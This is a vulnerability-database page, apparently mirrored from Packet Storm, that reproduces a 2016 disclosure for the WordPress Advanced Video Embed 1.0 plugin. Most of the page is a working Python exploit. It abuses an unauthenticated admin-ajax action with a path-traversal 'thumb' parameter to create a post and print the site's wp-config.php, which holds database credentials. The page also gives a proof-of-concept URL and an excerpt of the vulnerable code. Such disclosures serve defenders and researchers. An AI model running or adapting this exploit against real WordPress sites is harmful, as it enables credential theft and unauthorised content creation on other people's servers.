Lucene search
K

WordPress Advanced Video 1.0 Local File Inclusion

🗓️ 01 Apr 2016 00:00:00Reported by evait security GmbHType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 41 Views

WordPress Advanced Video 1.0 Local File Inclusion vulnerability discoevred on /inc/classes/class.avePost.php, allows arbitrary file downloads and unauthenticated post creation

Code
`#!/usr/bin/env python  
  
# Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation  
# Google Dork: N/A  
# Date: 04/01/2016  
# Exploit Author: evait security GmbH  
# Vendor Homepage: arshmultani - http://dscom.it/  
# Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/  
# Version: 1.0  
# Tested on: Linux Apache / Wordpress 4.2.2  
  
# Timeline  
# 03/24/2016 - Bug discovered  
# 03/24/2016 - Initial notification of vendor  
# 04/01/2016 - No answer from vendor, public release of bug   
  
  
# Vulnerable Code (/inc/classes/class.avePost.php) Line 57:  
  
# function ave_publishPost(){  
# $title = $_REQUEST['title'];  
# $term = $_REQUEST['term'];  
# $thumb = $_REQUEST['thumb'];  
# <snip>  
# Line 78:  
# $image_data = file_get_contents($thumb);  
  
  
# POC - http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]  
  
# Exploit - Print the content of wp-config.php in terminal (default Wordpress config)  
  
import random  
import urllib2  
import re  
  
url = "http://127.0.0.1/wordpress" # insert url to wordpress  
  
randomID = long(random.random() * 100000000000000000L)  
  
objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')  
content = objHtml.readlines()  
for line in content:  
numbers = re.findall(r'\d+',line)  
id = numbers[-1]  
id = int(id) / 10  
  
objHtml = urllib2.urlopen(url + '/?p=' + str(id))  
content = objHtml.readlines()  
  
for line in content:  
if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:  
urls=re.findall('"(https?://.*?)"', line)  
print urllib2.urlopen(urls[0]).read()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation